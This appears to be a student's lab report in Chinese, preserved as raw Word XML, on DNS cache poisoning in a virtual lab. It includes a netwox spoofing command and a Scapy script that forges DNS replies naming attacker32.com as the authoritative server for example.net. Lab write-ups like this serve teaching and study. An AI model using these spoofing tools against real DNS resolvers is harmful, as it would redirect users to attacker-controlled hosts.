    <w:p w14:paraId="35D64979" w14:textId="77777777" w:rsidR="0063177C" w:rsidRPr="00B92842" w:rsidRDefault="008C4023">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task 6: DNS Cache Poisoning Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD8849" w14:textId="77777777" w:rsidR="008C4023" w:rsidRDefault="00C60876">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNScache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008C4023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C4023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C4023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF256D8" w14:textId="77777777" w:rsidR="008C4023" w:rsidRDefault="008C4023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netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 105 -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00C60876" w:rsidRPr="008455EF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>www.example.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C60876">
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t>4.3.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t>ns.attack.com</w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t xml:space="preserve"> -A </w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t>192.168.1.108</w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t>192.168.1.107</w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t xml:space="preserve"> -T 600 -s </w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C60876">
        <w:t>raw</w:t>
      </w:r>
      <w:r w:rsidR="00C60876" w:rsidRPr="0063177C">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFAA644" w14:textId="77777777" w:rsidR="00C60876" w:rsidRDefault="00C60876">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C933AD" w14:textId="77777777" w:rsidR="00C60876" w:rsidRDefault="00C60876">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7014BD46" wp14:editId="66AE1300">
            <wp:extent cx="5270500" cy="1009815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20-09-16 下午19.55.07 下午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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="100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05DCD" w14:textId="77777777" w:rsidR="00C60876" w:rsidRDefault="00C60876">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看缓存，发现已被攻击者污染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB2ECE" w14:textId="12BA3448" w:rsidR="00C60876" w:rsidRDefault="001A488C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F1BC87B" wp14:editId="27E6FC96">
            <wp:extent cx="5270500" cy="7588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20-09-16 下午21.28.12 下午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5D5D" w14:textId="672E7CE5" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="7D7A3B4C" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2F6A8F" w14:textId="77777777" w:rsidR="00D30217" w:rsidRPr="007020EE" w:rsidRDefault="00772617" w:rsidP="00D3021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20EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 7: DNS Cache Poisoning: Targeting the </w:t>
      </w:r>
      <w:r w:rsidRPr="007020EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2917B2A3" w14:textId="77777777" w:rsidR="00D30217" w:rsidRDefault="00D30217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编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E825F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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from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scapy.all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92842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</w:p>
    <w:p w14:paraId="294C38D3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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>spoof_dns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pk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14:paraId="6C2CC6F9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B92842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DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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pkt </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and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‘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example.net’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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pkt[DNS].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qd.qname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14:paraId="0CDA33E0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IPpkt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IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/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dst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pkt[IP].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src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src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pkt[IP].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dst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2A04BDC4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UDPpkt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UDP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/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dport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pkt[UDP].sport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spor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53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12F0D42F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Anssec = </w:t>
      </w:r>
      <w:proofErr w:type="gram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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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rrname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pkt[DNS].qd.qname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type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’A’,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ttl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259200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, rdata=’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.2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.3.4’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08C998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NSsec = </w:t>
      </w:r>
      <w:proofErr w:type="gram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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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rrname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’example.net’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type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’NS’,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ttl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259200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, rdata=’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.2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.3.4’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382AA0BD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Addsec = </w:t>
      </w:r>
      <w:proofErr w:type="gram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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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rrname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’attacker32.com’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type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’A’,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ttl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259200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, rdata=’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.2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.3.4’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665484D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DNSpkt=</w:t>
      </w:r>
      <w:proofErr w:type="gram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DNS(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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id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pkt[DNS].id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qd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pkt[DNS].qd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aa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rd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qr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qdcoun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ancoun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nscoun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arcoun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an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Anssec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ns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NSsec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ar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Addsec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693A36B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spoofpkt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IPpkt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/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UDPpkt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/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DNSpkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68F0F37F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send(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spoofpkt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7EBA2EBE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pkt=</w:t>
      </w:r>
      <w:proofErr w:type="gram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sniff(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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filter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’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udp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92842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and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dst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port 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53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’,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prn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proofErr w:type="spellStart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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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47A02689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A82CCB2" w14:textId="77777777" w:rsidR="00076995" w:rsidRPr="00B92842" w:rsidRDefault="00076995" w:rsidP="00D30217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F3AE0A" w14:textId="77777777" w:rsidR="00363302" w:rsidRDefault="00076995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该脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00076995">
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>将example.net 的Authoritative name server设置为attacker32.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68AC9F" w14:textId="77777777" w:rsidR="00076995" w:rsidRPr="00076995" w:rsidRDefault="00076995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在攻击者虚拟机中运行该脚本，可以使得用户虚拟机中对example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>域名下的子域名解析的时候让DNS服务器向a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ttacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>发起DNS请求，从而达到攻击的目的。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00076995" w:rsidRPr="00076995" w:rsidSect="00CC6E8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46"/>
    <w:rsid w:val="00015119"/>
    <w:rsid w:val="00076995"/>
    <w:rsid w:val="001A488C"/>
    <w:rsid w:val="0028116A"/>
    <w:rsid w:val="00363302"/>
    <w:rsid w:val="00387F46"/>
    <w:rsid w:val="005825F3"/>
    <w:rsid w:val="0063177C"/>
    <w:rsid w:val="00695998"/>
    <w:rsid w:val="007020EE"/>
    <w:rsid w:val="0070323B"/>
    <w:rsid w:val="00772617"/>
    <w:rsid w:val="007D634B"/>
    <w:rsid w:val="008C4023"/>
    <w:rsid w:val="00A2456E"/>
    <w:rsid w:val="00A2519F"/>
    <w:rsid w:val="00B203C5"/>
    <w:rsid w:val="00B92842"/>
    <w:rsid w:val="00C60876"/>
    <w:rsid w:val="00CB1131"/>
    <w:rsid w:val="00CB5442"/>
    <w:rsid w:val="00CC6E8A"/>
    <w:rsid w:val="00D2093F"/>
    <w:rsid w:val="00D30217"/>
    <w:rsid w:val="00D70459"/>
    <w:rsid w:val="00F87120"/>
    <w:rsid w:val="00FE6D55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CEC7C"/>
  <w14:defaultImageDpi w14:val="32767"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{32735C5A-E15C-A242-9051-E5EFB6DD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63302"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:cs="Times New Roman (正文 CS 字体)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9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D2093F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8C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example.ne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089BA-A79B-7741-A169-6DA00E09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鸣宇 马</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-18T01:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-18T01:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>